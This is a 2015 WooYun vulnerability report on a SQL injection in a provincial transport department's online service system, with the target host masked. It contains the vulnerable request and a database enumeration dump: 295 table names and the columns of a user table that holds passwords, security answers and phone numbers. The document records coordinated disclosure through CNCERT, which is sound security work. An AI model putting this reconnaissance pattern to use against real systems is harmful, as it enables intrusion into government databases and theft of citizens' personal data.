当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139611

漏洞标题:某省交通运输厅网上办事业务系统存在SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: qglfnt

提交时间:2015-09-10 16:42

修复时间:2015-10-26 11:24

公开时间:2015-10-26 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

RT

详细说明:

**.**.**.**:10080/qymanage/IndexNew.aspx

漏洞证明:

SQL注入数据包

GET **.**.**.**:10080/qymanage/XNetHall_OnlineTransact.aspx?pid=877dfc89-f7f9-43cc-a1ea-9c3ca5af6462 HTTP/1.1
Host: **.**.**.**:10080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**:10080/qymanage/IndexNew.aspx
Cookie: ASP.NET_SessionId=zymwkwewpvn3zab5ysc2wggx
Connection: keep-alive


所有库

20150907215314.png


当前库

20150907215417.png



Database: YnJJTApproveDB
[295 tables]
+--------------------------------------+
| AddressBookGroup                     |
| AddressBookGroupPerson               |
| AddressBookPublic                    |
| ApproveApply                         |
| ApproveApplyRecord                   |
| ApproveApplyWrokFlowRelation         |
| ApproveItem                          |
| ApproveItemAndUserDepartmentRelation |
| ApproveItemAttach                    |
| ApproveItemAttachLog                 |
| ApproveItemForDepartment             |
| ApproveItemGroup                     |
| ApproveItemRelation                  |
| ApproveItemSAAInfo                   |
| ApproveItemServiceOBJClass           |
| Archive                              |
| DocumentExchange                     |
| DocumentExchangeComment              |
| DocumentExchangeOpRecord             |
| DocumentTransfer                     |
| DocumentTransferComment              |
| DocumentTransferOpRecord             |
| Evaluate_AddScore                    |
| Evaluate_BasicInfo                   |
| Evaluate_Document                    |
| Evaluate_Grade                       |
| Evaluate_GradeDetail                 |
| Evaluate_Group                       |
| Evaluate_GroupUser                   |
| Evaluate_Norm                        |
| ExamAnswer                           |
| ExamLib                              |
| ExamPerson                           |
| ExamSubject                          |
| Flow                                 |
| FlowOnForm                           |
| FlowWork                             |
| Form                                 |
| FormField                            |
| Label                                |
| Node                                 |
| NodeExtSetting                       |
| NodeFormDeploy                       |
| NodeRunUser                          |
| NodeUser                             |
| OA_ArticleReaded                     |
| OA_Articles                          |
| OA_ArticlesSubmit                    |
| OA_ArticlesUp                        |
| OA_Cars                              |
| OA_CarsApply                         |
| OA_DW                                |
| OA_DocExchangeSysWorkRelation        |
| OA_DocumentArchives                  |
| OA_DocumentNumber                    |
| OA_DocumentTypes                     |
| OA_DocumentTypesSub                  |
| OA_Document_Signature                |
| OA_ExtSettingDep                     |
| OA_ExtSettingUser                    |
| OA_FixAsset                          |
| OA_MeetingRoom                       |
| OA_MeetingRoomApply                  |
| OA_MeetingRoomApplyAndDeal           |
| OA_MeetingRoomEquipmentDeal          |
| OA_OfficeQRCodeFormFields            |
| OA_Schedule                          |
| OA_ScheduleCheck                     |
| OA_Signature                         |
| OA_TableName                         |
| OA_TableName_20140228170023293064    |
| OA_TableName_20140304103815116141    |
| OA_TableName_20140304160758838227    |
| OA_TableName_20140306143911979561    |
| OA_TableName_20140404091609721100    |
| OA_TableName_20140415153004683685    |
| OA_TableName_20141124110348376685    |
| OA_TableName_20141203101738966713    |
| OA_TableName_20141216135006070186    |
| OA_TableName_20141216150842957721    |
| OA_TableName_20150313135240290354    |
| OA_TableName_20150407164616063214    |
| OA_TableName_20150409161556746268    |
| OA_TableName_20150413142304774755    |
| OA_TableName_20150414151646902514    |
| OA_TableName_20150417113405866140    |
| OA_TableName_20150624153348834586    |
| OA_TableName_20150624153844658147    |
| OA_TableName_20150624154329249101    |
| OA_TableName_20150624154541303040    |
| OA_TableName_20150624154957924816    |
| OA_TableName_20150624155527349812    |
| OA_TableName_20150624155642885770    |
| OA_TableName_20150624155806095344    |
| OA_TableName_20150624155912302056    |
| OA_TableName_20150624160012611456    |
| OA_TableName_20150624160129317652    |
| OA_TableName_20150624160308018056    |
| OA_TableName_20150624160411245456    |
| OA_TableName_20150624160524862710    |
| OA_TableName_20150624160707182530    |
| OA_TableName_20150624160752859813    |
| OA_TableName_20150624160848645871    |
| OA_TableName_20150624160950686670    |
| OA_TableName_20150624161226796530    |
| OA_TableName_20150624161319180705    |
| OA_TableName_20150624161359741842    |
| OA_TableName_20150624161718001482    |
| OA_TableName_20150624163032480865    |
| OA_TableName_20150624163254924760    |
| OA_TableName_20150624163418181813    |
| OA_TableName_20150624163509474644    |
| OA_TableName_20150624163658128253    |
| OA_TableName_20150624163749218463    |
| OA_TableName_20150624163903927360    |
| OA_TableName_20150624163952848802    |
| OA_TableName_20150624164028463633    |
| OA_TableName_20150624164112050034    |
| OA_TableName_20150624164210987256    |
| OA_TableName_20150624164307334813    |
| OA_TableName_20150624164355101578    |
| OA_TableName_20150624164511495623    |
| OA_TableName_20150624164627654502    |
| OA_TableName_20150624164707013767    |
| OA_TableName_20150624164827415334    |
| OA_TableName_20150624164934324270    |
| OA_TableName_20150624165029564021    |
| OA_TableName_20150624165114336112    |
| OA_TableName_20150624165206081013    |
| OA_TableName_20150624165244332780    |
| OA_TableName_20150624165927905004    |
| OA_TableName_20150624170023847542    |
| OA_TableName_20150624170106450028    |
| OA_TableName_20150624170218226564    |
| OA_TableName_20150624170248802754    |
| OA_TableName_20150624170338956103    |
| OA_TableName_20150624170412231841    |
| OA_TableName_20150624170443946525    |
| OA_TableName_20150625145500830561    |
| OA_TableName_20150625150237037224    |
| OA_TableName_20150625150311544524    |
| OA_TableName_20150625150648712160    |
| OA_TableName_20150625150714764370    |
| OA_TableName_20150625150745309725    |
| OA_TableName_20150625150906008518    |
| OA_TableName_20150625150930001580    |
| OA_TableName_20150625151001201772    |
| OA_TableName_20150625151031606582    |
| OA_TableName_20150625151107127166    |
| OA_TableName_20150625151135706530    |
| OA_TableName_20150625151206204407    |
| OA_TableName_20150625151232147716    |
| OA_TableName_20150625151301912770    |
| OA_TableName_20150625151339836234    |
| OA_TableName_20150626151341991630    |
| OA_TableName_20150626160007423214    |
| OA_TableName_20150626160314358354    |
| OA_TableName_20150626160558174455    |
| OA_TableName_20150626160741961454    |
| OA_TableName_20150626160858807768    |
| OA_TableName_20150626161020083875    |
| OA_TableName_20150626161147225187    |
| OA_TableName_20150626161314647143    |
| OA_TableName_20150626161527294786    |
| OA_TableName_20150626161705855546    |
| OA_TableName_20150626161907021682    |
| OA_TableName_20150702182117805303    |
| OA_TableName_20150702182127882770    |
| OA_TableName_20150702182346676870    |
| OA_TableName_20150706175724049811    |
| OA_TableName_20150709141755976087    |
| OA_TableName_20150709142145062082    |
| OA_TableName_20150709142346446852    |
| OA_TableName_20150709142647079122    |
| OA_TableName_20150727111438530553    |
| OA_TableName_20150731145916231205    |
| OA_TableName_FieldDescribe           |
| OA_Test                              |
| OA_WorkApprove                       |
| OA_WorkApproveArchiveDocument        |
| OA_WorkApproveAssign                 |
| OA_WorkApproveComments               |
| OA_WorkApproveDelegation             |
| OA_WorkApproveDelegationWork         |
| OA_WorkApproveHook                   |
| OA_WorkApproveOnlyRecycleSelf        |
| OA_WorkApproveReaded                 |
| OA_WorkApproveRecord                 |
| OA_WorkApproveRoute                  |
| OA_WorkApproveSignoffRecord          |
| OA_WorkApproveUnion                  |
| OA_WorkApproveUrge                   |
| OA_WorkApproveVirtualRemindComments  |
| OA_WorkApproveVirtualRemindReaded    |
| OA_Work_Connector                    |
| OtherAccountRelation                 |
| ReceiveDocBook                       |
| Report_FillInfomation                |
| Report_TableName                     |
| Route                                |
| SMSSend                              |
| SMSSendHistory                       |
| SysAccountRelation                   |
| T_AccountCustomRole                  |
| T_AccountCustomRoleWithFunction      |
| T_AccountFunction                    |
| T_AccountRole                        |
| T_AccountRoleFunctionCommand         |
| T_AccountRoleLevel                   |
| T_AccountRoleWithFunction            |
| T_AccountUserWithRole                |
| T_Catalogue                          |
| T_Department                         |
| T_DicArea                            |
| T_Log                                |
| T_Organization                       |
| T_PROJECT                            |
| T_PROPRIOTER                         |
| T_SiteInfo                           |
| T_SysDictionary                      |
| T_User                               |
| T_UserEX                             |
| T_UserGroup                          |
| T_UserGroupUser                      |
| T_UserHomePageStyle                  |
| T_UserOutSide                        |
| TaskPlan                             |
| TaskPlanImplement                    |
| TaskPlanRelationPlan                 |
| TaskPlanUserRoleDetail               |
| Test_Company                         |
| Test_Three                           |
| UserScanDirectory                    |
| V_1234                               |
| V_22222222222                        |
| V_AddressBookGroupPersonInfo         |
| V_AddressBookPublicInfo              |
| V_ApproveApply                       |
| V_ApproveItemGroup                   |
| V_ArticleInfo                        |
| V_AttachUser                         |
| V_CarsApplyInfo                      |
| V_CarsInfo                           |
| V_CustomUserRoles                    |
| V_DWInfo                             |
| V_DataBaseTable                      |
| V_DelegationRuleInfo                 |
| V_DelegationRuleInfoWork             |
| V_DocumentNumberInfo                 |
| V_DocumentSignatureInfo              |
| V_DocumentTypesInfo                  |
| V_ExamAnswerInfo                     |
| V_ExamLibInfo                        |
| V_ExamPersonInfo                     |
| V_ExamSubjectInfo                    |
| V_ExchangeCommentInfo                |
| V_ExchangeInfo                       |
| V_FixAssetInfo                       |
| V_FlowDep                            |
| V_FlowInfo                           |
| V_FlowUser                           |
| V_FormInfo                           |
| V_MeetingRoomApplyAndDealInfo        |
| V_MeetingRoomApplyInfo               |
| V_MeetingRoomEquipmentInfo           |
| V_MeetingRoomInfo                    |
| V_NodeDisplayFormField               |
| V_OA_OfficeQRCodeFormFields          |
| V_Organ                              |
| V_ReceiveDocBookInfo                 |
| V_RedHead                            |
| V_RoleInfo                           |
| V_SignatureInfo                      |
| V_SiteWithAreaInfo                   |
| V_TaskPlanInfo                       |
| V_TimeouSstatistics                  |
| V_TransferCommentInfo                |
| V_TransferInfo                       |
| V_UserGroupUserInfo                  |
| V_UserHomePageStyle                  |
| V_UserInfo                           |
| V_UserRoles                          |
| V_WorkApprove                        |
| V_WorkArchiveDocument                |
| V_WorkAssign                         |
| V_WorkCount                          |
| V_WorkDelegationForDelegated         |
| V_WorkHook                           |
| V_WorkUrge                           |
| V_WorkVirtualCommentsReadInfo        |
| View_1                               |
| sys_Field                            |
| sys_FieldValue                       |
| sysdiagrams                          |
| v_work_connector                     |
+--------------------------------------+


字段

Database: YnJJTApproveDB
Table: T_User
[17 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| CellPhone         | nvarchar         |
| CreateTime        | datetime         |
| Email             | nvarchar         |
| LastLoginIP       | nvarchar         |
| LockTime          | datetime         |
| QAnswers          | nvarchar         |
| QuestionIDs       | nvarchar         |
| RealName          | nvarchar         |
| Status            | smallint         |
| UserID            | uniqueidentifier |
| UserName          | nvarchar         |
| UserPWD           | nvarchar         |
| UserSignaturePWD  | nvarchar         |
| UserType          | smallint         |
| VerifyCode        | nvarchar         |
| VerifyCodeGenTime | datetime         |
| WrongPWDTimes     | smallint         |
+-------------------+------------------+


数据信息

20150907215646.jpg

修复方案:

过滤参数

版权声明:转载请注明来源 qglfnt@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-11 11:23

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无